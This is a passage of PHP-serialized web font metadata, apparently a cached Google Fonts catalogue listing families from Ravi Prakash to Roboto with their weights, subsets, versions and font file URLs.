Prakash\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/raviprakash/v19/gokpH6fsDkVrF9Bv9X8SOAKHmNZEq6TTFw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1143;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Readex Pro\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:93:\"http://fonts.gstatic.com/s/readexpro/v10/SLXYc1bJ7HE5YDoGPuzj_dh8na74KiwZQQzfm7w3bk38hTB8.ttf\";s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/readexpro/v10/SLXYc1bJ7HE5YDoGPuzj_dh8na74KiwZQQwBm7w3bk38hTB8.ttf\";s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/readexpro/v10/SLXYc1bJ7HE5YDoGPuzj_dh8na74KiwZQQxfm7w3bk38hTB8.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/readexpro/v10/SLXYc1bJ7HE5YDoGPuzj_dh8na74KiwZQQxtm7w3bk38hTB8.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/readexpro/v10/SLXYc1bJ7HE5YDoGPuzj_dh8na74KiwZQQyBnLw3bk38hTB8.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/readexpro/v10/SLXYc1bJ7HE5YDoGPuzj_dh8na74KiwZQQy4nLw3bk38hTB8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1144;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Recursive\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v35\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"300\";s:161:\"http://fonts.gstatic.com/s/recursive/v35/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadDck018vwxjDJCL.ttf\";s:7:\"regular\";s:161:\"http://fonts.gstatic.com/s/recursive/v35/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadCCk018vwxjDJCL.ttf\";s:3:\"500\";s:161:\"http://fonts.gstatic.com/s/recursive/v35/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadCwk018vwxjDJCL.ttf\";s:3:\"600\";s:161:\"http://fonts.gstatic.com/s/recursive/v35/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadBclE18vwxjDJCL.ttf\";s:3:\"700\";s:161:\"http://fonts.gstatic.com/s/recursive/v35/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadBllE18vwxjDJCL.ttf\";s:3:\"800\";s:161:\"http://fonts.gstatic.com/s/recursive/v35/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadAClE18vwxjDJCL.ttf\";s:3:\"900\";s:161:\"http://fonts.gstatic.com/s/recursive/v35/8vJN7wMr0mhh-RQChyHEH06TlXhq_gukbYrFMk1QuAIcyEwG_X-dpEfaE5YaERmK-CImKsvxvU-MXGX2fSqasNfUvz2xbXfn1uEQadArlE18vwxjDJCL.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1145;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Red Hat Display\";s:8:\"variants\";a:14:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:9:\"300italic\";i:8;s:6:\"italic\";i:9;s:9:\"500italic\";i:10;s:9:\"600italic\";i:11;s:9:\"700italic\";i:12;s:9:\"800italic\";i:13;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"300\";s:104:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbjKWckg5-Xecg3w.ttf\";s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbmyWckg5-Xecg3w.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbl6Wckg5-Xecg3w.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbrKRckg5-Xecg3w.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbouRckg5-Xecg3w.ttf\";s:3:\"800\";s:104:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbuyRckg5-Xecg3w.ttf\";s:3:\"900\";s:104:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIf7wUr0m80wwYf0QCXZzYzUoTK8RZQvRd-D1NYbsWRckg5-Xecg3w.ttf\";s:9:\"300italic\";s:107:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVxAsz_VWZk3zJGg.ttf\";s:6:\"italic\";s:107:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVmgsz_VWZk3zJGg.ttf\";s:9:\"500italic\";s:107:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVqAsz_VWZk3zJGg.ttf\";s:9:\"600italic\";s:107:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVRAwz_VWZk3zJGg.ttf\";s:9:\"700italic\";s:107:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVfQwz_VWZk3zJGg.ttf\";s:9:\"800italic\";s:107:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVGgwz_VWZk3zJGg.ttf\";s:9:\"900italic\";s:107:\"http://fonts.gstatic.com/s/redhatdisplay/v14/8vIh7wUr0m80wwYf0QCXZzYzUoTg-CSvZX4Vlf1fe6TVMwwz_VWZk3zJGg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1146;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Red Hat Mono\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:97:\"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQQPI-7HNuW4QuKI.ttf\";s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQV3I-7HNuW4QuKI.ttf\";s:3:\"500\";s:97:\"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQW_I-7HNuW4QuKI.ttf\";s:3:\"600\";s:97:\"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQYPP-7HNuW4QuKI.ttf\";s:3:\"700\";s:97:\"http://fonts.gstatic.com/s/redhatmono/v10/jVyY7nDnA2uf2zVvFAhhzEs-VMSjJpBTfgjwQbrP-7HNuW4QuKI.ttf\";s:9:\"300italic\";s:100:\"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWLTfLHvUwVqKIJuw.ttf\";s:6:\"italic\";s:100:\"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWLE_LHvUwVqKIJuw.ttf\";s:9:\"500italic\";s:100:\"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWLIfLHvUwVqKIJuw.ttf\";s:9:\"600italic\";s:100:\"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWLzfXHvUwVqKIJuw.ttf\";s:9:\"700italic\";s:100:\"http://fonts.gstatic.com/s/redhatmono/v10/jVye7nDnA2uf2zVvFAhhzEsUXfZc_vk45Kb3VJWL9PXHvUwVqKIJuw.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1147;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Red Hat Text\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:97:\"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML-ZwVrbacYVFtIY.ttf\";s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML7hwVrbacYVFtIY.ttf\";s:3:\"500\";s:97:\"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML4pwVrbacYVFtIY.ttf\";s:3:\"600\";s:97:\"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML2Z3VrbacYVFtIY.ttf\";s:3:\"700\";s:97:\"http://fonts.gstatic.com/s/redhattext/v13/RrQCbohi_ic6B3yVSzGBrMx6ZI_cy1A6Ok2ML193VrbacYVFtIY.ttf\";s:9:\"300italic\";s:100:\"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAz4PXQdadApIYv_g.ttf\";s:6:\"italic\";s:100:\"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAzvvXQdadApIYv_g.ttf\";s:9:\"500italic\";s:100:\"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAzjPXQdadApIYv_g.ttf\";s:9:\"600italic\";s:100:\"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAzYPLQdadApIYv_g.ttf\";s:9:\"700italic\";s:100:\"http://fonts.gstatic.com/s/redhattext/v13/RrQEbohi_ic6B3yVSzGBrMxQbb0jEzlRoOOLOnAzWfLQdadApIYv_g.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1148;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Red Rose\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:89:\"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8y8_sDcjSsYUVUjg.ttf\";s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yrfsDcjSsYUVUjg.ttf\";s:3:\"500\";s:89:\"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yn_sDcjSsYUVUjg.ttf\";s:3:\"600\";s:89:\"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8yc_wDcjSsYUVUjg.ttf\";s:3:\"700\";s:89:\"http://fonts.gstatic.com/s/redrose/v14/QdVISTYiLBjouPgEUajvsfWwDtc3MH8ySvwDcjSsYUVUjg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1149;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Redacted\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/redacted/v6/Z9XVDmdRShme2O_7aITe4u2El6GC.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1150;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Redacted Script\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:91:\"http://fonts.gstatic.com/s/redactedscript/v6/ypvEbXGRglhokR7dcC3d1-R6zmxqHUzVmbI397ldkg.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/redactedscript/v6/ypvBbXGRglhokR7dcC3d1-R6zmxSsWTxkZkr_g.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/redactedscript/v6/ypvEbXGRglhokR7dcC3d1-R6zmxqDUvVmbI397ldkg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1151;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Redressed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/redressed/v25/x3dickHUbrmJ7wMy9MsBfPACvy_1BA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1152;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Reem Kufi\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/reemkufi/v18/2sDPZGJLip7W2J7v7wQZZE1I0yCmYzzQtuZnEGGf3qGuvM4.ttf\";s:3:\"500\";s:91:\"http://fonts.gstatic.com/s/reemkufi/v18/2sDPZGJLip7W2J7v7wQZZE1I0yCmYzzQttRnEGGf3qGuvM4.ttf\";s:3:\"600\";s:91:\"http://fonts.gstatic.com/s/reemkufi/v18/2sDPZGJLip7W2J7v7wQZZE1I0yCmYzzQtjhgEGGf3qGuvM4.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/reemkufi/v18/2sDPZGJLip7W2J7v7wQZZE1I0yCmYzzQtgFgEGGf3qGuvM4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1153;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Reem Kufi Fun\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/reemkufifun/v4/uK_m4rOFYukkmyUEbF43fIryZEk5qRZ8nrKChoYj3nCgrvqZzZXq.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/reemkufifun/v4/uK_m4rOFYukkmyUEbF43fIryZEk5qRZ8nrKChoYR3nCgrvqZzZXq.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/reemkufifun/v4/uK_m4rOFYukkmyUEbF43fIryZEk5qRZ8nrKChob92XCgrvqZzZXq.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/reemkufifun/v4/uK_m4rOFYukkmyUEbF43fIryZEk5qRZ8nrKChobE2XCgrvqZzZXq.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1154;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Reem Kufi Ink\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/reemkufiink/v4/oPWJ_kJmmu8hCvB9iFumxZSnRj5dQnSX1ko.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1155;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Reenie Beanie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/reeniebeanie/v16/z7NSdR76eDkaJKZJFkkjuvWxbP2_qoOgf_w.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1156;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Reggae One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/reggaeone/v14/~CgwKClJlZ2dhZSBPbmUgACoECAEYAQ==.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1157;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Revalia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/revalia/v20/WwkexPimBE2-4ZPEeVruNIgJSNM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1158;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Rhodium Libre\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/rhodiumlibre/v17/1q2AY5adA0tn_ukeHcQHqpx6pETLeo2gm2U.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1159;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Ribeye\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/ribeye/v21/L0x8DFMxk1MP9R3RvPCmRSlUig.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1160;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Ribeye Marrow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/ribeyemarrow/v22/GFDsWApshnqMRO2JdtRZ2d0vEAwTVWgKdtw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1161;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Righteous\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/righteous/v13/1cXxaUPXBpj2rGoU7C9mj3uEicG01A.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1162;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Risque\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/risque/v20/VdGfAZUfHosahXxoCUYVBJ-T5g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1163;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Road Rage\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:73:\"http://fonts.gstatic.com/s/roadrage/v5/6NUU8F2fKAOBKjjr4ekvtMYAwdRZfw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1164;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Roboto\";s:8:\"variants\";a:12:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v30\";s:12:\"lastModified\";s:10:\"2022-05-12\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"100\";s:70:\"http://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1MmgWxPKTM1K9nz.ttf\";s:9:\"100italic\";s:73:\"http://fonts.gstatic.com/s/roboto/v30/KFOiCnqEu92Fr1Mu51QrIzcXLsnzjYk.ttf\";s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5vAx05IsDqlA.ttf\";s:9:\"300italic\";s:74:\"http://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TjARc9AMX6lJBP.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Me5WZLCzYlKw.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1Mu52xPKTM1K9nz.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9vAx05IsDqlA.ttf\";s:9:\"500italic\";s:74:\"http://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51S7ABc9AMX6lJBP.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAx05IsDqlA.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TzBhc9AMX6lJBP.ttf\";s:3:\"900\";s:72:\"http://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtvAx05IsDqlA.ttf\";s:9:\"900italic\";s:74:\"http://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TLBBc9AMX6lJBP.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1165;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Roboto 